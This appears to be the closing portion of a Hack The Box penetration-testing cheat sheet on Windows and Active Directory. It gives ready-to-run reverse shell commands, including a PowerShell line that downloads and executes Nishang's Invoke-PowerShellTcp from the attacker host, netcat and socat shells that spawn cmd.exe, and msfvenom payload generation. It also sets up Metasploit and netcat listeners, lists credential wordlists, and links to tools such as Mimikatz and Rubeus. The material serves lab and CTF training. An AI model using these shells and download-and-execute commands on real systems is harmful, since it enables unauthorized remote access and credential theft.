# Nishang reverse shell
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress $LHOST -Port $LPORT

# CMD reverse shell via nc
.\nc.exe $LHOST $LPORT -e cmd.exe

# MSFVenom (see Phase 5)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o shell.exe

Listeners

bash
# Netcat
nc -lvnp $LPORT
rlwrap nc -lvnp $LPORT   # better arrow keys

# Metasploit multi/handler
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/shell_reverse_tcp
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
run -j

# Socat (fully interactive)
socat file:`tty`,raw,echo=0 TCP-LISTEN:$LPORT
# On Windows:
.\socat.exe TCP:$LHOST:$LPORT EXEC:cmd.exe,pty,stderr,setsid,sigint,sane

Wordlists & Resources

bash
# Passwords
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

# Usernames
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
/usr/share/seclists/Usernames/Names/names.txt

# Web
/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
/usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt

# DNS
/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

Key References & Tools

bash
# References
LOLBAS (the Windows counterpart of GTFOBins): https://lolbas-project.github.io
HackTricks AD: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
BloodHound: https://github.com/BloodHoundAD/BloodHound
Impacket: https://github.com/SecureAuthCorp/impacket

# Tool Download Locations
WinPEAS: https://github.com/carlospolop/PEASS-ng/releases
Rubeus: https://github.com/GhostPack/Rubeus
SharpHound: https://github.com/BloodHoundAD/SharpHound
Mimikatz: https://github.com/gentilkiwi/mimikatz
PowerView: https://github.com/PowerShellMafia/PowerSploit
PowerUp: https://github.com/PowerShellMafia/PowerSploit
Seatbelt: https://github.com/GhostPack/Seatbelt
GodPotato: https://github.com/BeichenDream/GodPotato
PrintSpoofer: https://github.com/itm4n/PrintSpoofer
Certify: https://github.com/GhostPack/Certify
Certipy: https://github.com/ly4k/Certipy   (ADCS attacks from Kali)

🔒 Built for HTB by 0xRoot | Windows & Active Directory Methodology | Use responsibly on authorized systems only.